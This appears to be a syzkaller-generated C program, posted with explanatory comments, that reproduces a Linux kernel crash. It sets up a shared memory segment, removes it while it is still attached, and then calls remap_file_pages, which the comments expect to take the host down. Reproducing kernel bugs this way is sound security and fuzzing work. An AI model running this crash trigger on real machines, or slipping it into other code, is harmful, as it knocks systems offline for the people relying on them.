syzkaller program to reproduce a crash
[Posted March 1, 2016 by jake]
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
/* Fallback syscall numbers.  These are the Linux x86-64 values and are used
 * only when <sys/syscall.h> does not already define the SYS_* macro; the
 * raw fixed addresses in main() make the program Linux/x86-64 specific in any
 * case, so the fallbacks do not add portability. */
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_shmget
#define SYS_shmget 29
#endif
#ifndef SYS_shmat
#define SYS_shmat 30
#endif
#ifndef SYS_shmctl
#define SYS_shmctl 31
#endif
#ifndef SYS_remap_file_pages
#define SYS_remap_file_pages 216
#endif
/* One slot per recorded result: syscall return values and 32-bit words read
 * back from kernel-filled buffers.  The sparse indices actually used
 * (0, 1, 2, 18, 19, 35..39, 55, 71, 72) presumably follow syzkaller's internal
 * result numbering; slots that are never written keep the -1 set by the
 * memset() at the top of main(). */
long r[73];
/*
 * Entry point of the syzkaller-generated reproducer.  Each syscall result is
 * stored in r[], and some of the values the kernel writes into user buffers
 * are read back into r[] and fed into later calls.  Every buffer lives at a
 * hard-coded address inside the MAP_FIXED anonymous mapping created by the
 * first mmap(), so the program is only meaningful on Linux/x86-64 with that
 * address range free.  The page presents it as a kernel-crash reproducer; it
 * is expected to take the host down, not to return normally.
 *
 * NOTE(review): r[0] (the mmap() result) is never checked.  If the MAP_FIXED
 * mapping at 0x20000000 fails, the raw stores below fault in user space
 * before the first shm call is reached.
 */
int main()
{
/* Every byte 0xff: all 73 slots start as -1, the "failed / unset" marker. */
memset(r, -1, sizeof(r));
/* mmap(0x20000000, 0x2000, PROT_READ|PROT_WRITE,
 *      MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, fd = -1, offset 0):
 * two anonymous pages holding every argument buffer used below. */
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x2000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
/* shmget(key = 5, size = 0x2000, IPC_CREAT); the trailing zero arguments are
 * not part of shmget() and are ignored. */
r[1] = syscall(SYS_shmget, 0x5ul, 0x2000ul, 0x200ul, 0x20b03000ul, 0, 0);
/* shmat(r[1], 0x20b03000, SHM_RND|SHM_REMAP): attaches the segment at a second
 * fixed address, outside the anonymous mapping.  The same address is the
 * target of the final remap_file_pages() call; no shmdt() ever follows. */
r[2] = syscall(SYS_shmat, r[1], 0x20b03000ul, 0x6000ul, 0, 0, 0);
/* Seed the buffer for the IPC_INFO call with fuzz values.  The buffer starts
 * at 0x20000e4b, so every store in this group is misaligned: tolerated on
 * x86-64, undefined behaviour in portable C.  The wide constants are simply
 * truncated by the casts, e.g. (uint32_t)0xffffffffffffffff == 0xffffffff. */
*(uint32_t*)0x20000e4b = (uint32_t)0x3;
*(uint32_t*)0x20000e4f = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000e53 = (uint32_t)0x0;
*(uint32_t*)0x20000e57 = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000e5b = (uint32_t)0xffffffffffffffff;
*(uint16_t*)0x20000e5f = (uint16_t)0x1;
*(uint16_t*)0x20000e61 = (uint16_t)0xfa;
*(uint64_t*)0x20000e63 = (uint64_t)0x3;
*(uint64_t*)0x20000e6b = (uint64_t)0xee;
*(uint64_t*)0x20000e73 = (uint64_t)0x10000;
*(uint64_t*)0x20000e7b = (uint64_t)0x6520;
*(uint64_t*)0x20000e83 = (uint64_t)0x5;
*(uint32_t*)0x20000e8b = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000e8f = (uint32_t)0x0;
*(uint64_t*)0x20000e93 = (uint64_t)0x0;
/* shmctl(r[1], IPC_INFO (3), buf).  On success the 32-bit word at buf+4 is
 * read back into r[19]; presumably the kernel has overwritten the buffer by
 * then, since IPC_INFO is a read-out command. */
r[18] = syscall(SYS_shmctl, r[1], 0x3ul, 0x20000e4bul, 0, 0, 0);
if (r[18] != -1)
r[19] = *(uint32_t*)0x20000e4f;
/* Second buffer (at 0x2000028f, again misaligned) for the SHM_INFO call. */
*(uint32_t*)0x2000028f = (uint32_t)0x1000;
*(uint32_t*)0x20000293 = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000297 = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x2000029b = (uint32_t)0x0;
*(uint32_t*)0x2000029f = (uint32_t)0x0;
*(uint16_t*)0x200002a3 = (uint16_t)0x7;
*(uint16_t*)0x200002a5 = (uint16_t)0x100000000;
*(uint64_t*)0x200002a7 = (uint64_t)0x5;
*(uint64_t*)0x200002af = (uint64_t)0x6;
*(uint64_t*)0x200002b7 = (uint64_t)0x0;
*(uint64_t*)0x200002bf = (uint64_t)0x2;
*(uint64_t*)0x200002c7 = (uint64_t)0x4;
*(uint32_t*)0x200002cf = (uint32_t)0x0;
*(uint32_t*)0x200002d3 = (uint32_t)0xffffffffffffffff;
*(uint64_t*)0x200002d7 = (uint64_t)0xef0;
/* shmctl(r[1], SHM_INFO (0xe == 14), buf).  Four 32-bit words are read back
 * into r[36..39], each only if the call succeeded; otherwise those slots stay
 * at -1. */
r[35] = syscall(SYS_shmctl, r[1], 0xeul, 0x2000028ful, 0, 0, 0);
if (r[35] != -1)
r[36] = *(uint32_t*)0x20000293;
if (r[35] != -1)
r[37] = *(uint32_t*)0x20000297;
if (r[35] != -1)
r[38] = *(uint32_t*)0x2000029f;
if (r[35] != -1)
r[39] = *(uint32_t*)0x200002cf;
/* Third buffer (0x20001fb0, naturally aligned this time) for the SHM_UNLOCK
 * call.  The words at +4, +8, +0xc, +0x10 and +0x40 are seeded with the values
 * read back above (r[19], r[38], r[36], r[37], r[39]); any slot that was never
 * written is still -1 and is truncated to 0xffffffff by the store. */
*(uint32_t*)0x20001fb0 = (uint32_t)0x80;
*(uint32_t*)0x20001fb4 = r[19];
*(uint32_t*)0x20001fb8 = r[38];
*(uint32_t*)0x20001fbc = r[36];
*(uint32_t*)0x20001fc0 = r[37];
*(uint16_t*)0x20001fc4 = (uint16_t)0x7;
*(uint16_t*)0x20001fc6 = (uint16_t)0x10000;
*(uint64_t*)0x20001fc8 = (uint64_t)0x5;
*(uint64_t*)0x20001fd0 = (uint64_t)0xff;
*(uint64_t*)0x20001fd8 = (uint64_t)0x80000000;
*(uint64_t*)0x20001fe0 = (uint64_t)0x9;
*(uint64_t*)0x20001fe8 = (uint64_t)0x3;
*(uint32_t*)0x20001ff0 = r[39];
*(uint32_t*)0x20001ff4 = (uint32_t)0xffffffffffffffff;
*(uint64_t*)0x20001ff8 = (uint64_t)0x2;
/* shmctl(r[1], SHM_UNLOCK (0xc == 12), buf).  r[55] is never read again. */
r[55] = syscall(SYS_shmctl, r[1], 0xcul, 0x20001fb0ul, 0, 0, 0);
/* Fourth buffer (0x20000fb0) for the IPC_RMID call. */
*(uint32_t*)0x20000fb0 = (uint32_t)0x1;
*(uint32_t*)0x20000fb4 = (uint32_t)0x0;
*(uint32_t*)0x20000fb8 = (uint32_t)0x0;
*(uint32_t*)0x20000fbc = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000fc0 = (uint32_t)0x0;
*(uint16_t*)0x20000fc4 = (uint16_t)0x1;
*(uint16_t*)0x20000fc6 = (uint16_t)0x5;
*(uint64_t*)0x20000fc8 = (uint64_t)0x5059;
*(uint64_t*)0x20000fd0 = (uint64_t)0x3;
*(uint64_t*)0x20000fd8 = (uint64_t)0x6301;
*(uint64_t*)0x20000fe0 = (uint64_t)0x8001;
*(uint64_t*)0x20000fe8 = (uint64_t)0xfffffffffffffffd;
*(uint32_t*)0x20000ff0 = (uint32_t)0xffffffffffffffff;
*(uint32_t*)0x20000ff4 = (uint32_t)0x0;
*(uint64_t*)0x20000ff8 = (uint64_t)0x6;
/* shmctl(r[1], IPC_RMID (0), buf): marks the segment for destruction while it
 * is still attached at 0x20b03000 (no shmdt() was issued). */
r[71] = syscall(SYS_shmctl, r[1], 0x0ul, 0x20000fb0ul, 0, 0, 0);
/* remap_file_pages(start = 0x20b03000, size = 0x2000, prot = 0, pgoff = 7,
 * flags = <fuzz value>) on the attached-but-removed segment.  Presumably this
 * last call is the crash trigger; the page itself does not say which call
 * faults.  r[72] is never examined, and on a vulnerable kernel control does
 * not return here. */
r[72] = syscall(SYS_remap_file_pages, 0x20b03000ul, 0x2000ul, 0x0ul, 0x7ul, 0x21dd964cfba54855ul, 0);
return 0;
}